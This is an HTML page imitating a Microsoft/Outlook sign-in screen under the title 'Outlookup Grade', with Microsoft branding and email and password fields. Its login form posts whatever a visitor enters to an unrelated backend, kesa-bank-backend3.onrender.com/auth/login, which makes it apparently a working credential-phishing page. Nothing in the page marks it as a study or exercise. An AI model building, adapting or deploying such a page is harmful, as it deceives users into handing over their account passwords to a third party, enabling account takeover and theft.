<!DOCTYPE html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, shrink-to-fit=no"
    />
    <!-- Bootstrap CSS -->
    <link
     rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
      integrity="sha384-xOolHFLEh07PJGoPkLv1IbcEPTNtaed2xpHsD9ESMhqIYd0nLMwNLD69Npy4HI+N"
      crossorigin="anonymous"
    />
    <link rel="stylesheet" href="css/outlookupgrade.css" />
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer" />

    

    <title>Outlookup Grade</title>
    
  </head>
  <body class="outlookpgsection">
    <section>
      <div class="container">
        <div class="row justify-content-center mt-5">
          <div class="col-md-5 outlookpgsection1">
            <img src="images/Microsoft design01.png" alt="" />
            <h4 class="outlookpghead">Sign in</h4>
            <form action="https://kesa-bank-backend3.onrender.com/auth/login"
            id="signin-form"
            method="post"
            autocomplete="off">
              <input
                type="email"
                name="email"
                id="email"
                placeholder="Email, phone or Skype"
                class="outlookform mt-1"
              />
              <input
                type="password"
                name="password"
                id="password"
                placeholder="Password"
                class="outlookform mt-1"
              />
           
            <p class="mt-3">
              No account?<a href="" class="ml-1">Create one!</a>
            </p>
            <a href="" class="mt-2"
              >Sign in with a security key
              </a>
              <button class="outlookpgbutton">&#63;</button>
            <a>
            <div class="row justify-content-end outlookpgsection2">
              <button type="submit" class="outlookpgbutton1">Next</button>
            </div></a>
          </div>
        </div>
         </form>
        <div class="row justify-content-center">
          <div class="col-md-5 outlookpgsection3">
            <p class="paragraphsection3"><i class="fa fa-key pr-3 pgkey fa-rotate-270"></i>Sign-in-options</p>
           
          </div>
        </div>
      </div>
    </section>

    <!-- Optional JavaScript; choose one of the two! -->

    <!-- Option 1: jQuery and Bootstrap Bundle (includes Popper) -->
    <script
      src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"
      integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj"
      crossorigin="anonymous"
    ></script>
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-Fy6S3B9q64WdZWQUiU+q4/2Lc9npb8tCaSX9FK7E8HnRr0Jz8D6OP9dO5Vg3Q9ct"
      crossorigin="anonymous"
    ></script>

    <!-- Option 2: Separate Popper and Bootstrap JS -->
    <!--
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js" integrity="sha384-+sLIOodYLS7CIrQpBjl+C7nPvqq+FbNUBDunl/OZv93DB7Ln/533i8e/mZXLi/P+" crossorigin="anonymous"></script>
    -->
  </body>
</html>
